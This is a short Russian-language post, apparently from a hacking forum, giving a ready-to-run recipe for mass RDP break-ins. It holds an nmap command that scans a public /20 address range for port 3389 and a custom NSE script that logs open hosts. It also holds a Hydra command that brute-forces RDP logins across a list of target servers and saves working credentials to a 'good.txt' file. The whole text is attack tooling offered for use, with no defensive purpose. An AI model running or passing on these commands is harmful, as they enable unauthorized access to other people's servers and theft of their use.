Kali Linux
Nmap -->> nmap -Pn -p 3389 80.73.0.0/20 --script scan.nse
Hydra -- >> hydra -s 3389 -t 4 -V -L (путь до файла с логинами) -P (путь до файла со списком паролей) -o /root/good.txt -M (путь до файла со списком ip дедиков) rdp
ЭТО СКРИПТ ДЛЯ Nmap (script scan.nse):
local shortport = require "shortport"
description = [[
This simple script save results about 3389 port - RDP
]]
categories = {"default", "discovery"}
author = "Nu11ers3t"
license = "Same as Nmap--See
"
portrule = function(host, port)
local auth_port = { number=3389, protocol="tcp" }
local identd = nmap.get_port_state(host, auth_port) return identd ~= nil and identd.state == "open" and port.protocol == "tcp" and port.state == "open"
end
action = function(host, port) file = io.open ("/root/IPs.txt","a+") file:write (host.ip.."\n") file:flush() file:close()
end
Скрипть в папку /usr/share/nmap/scripts
Думаю начать можно с этого.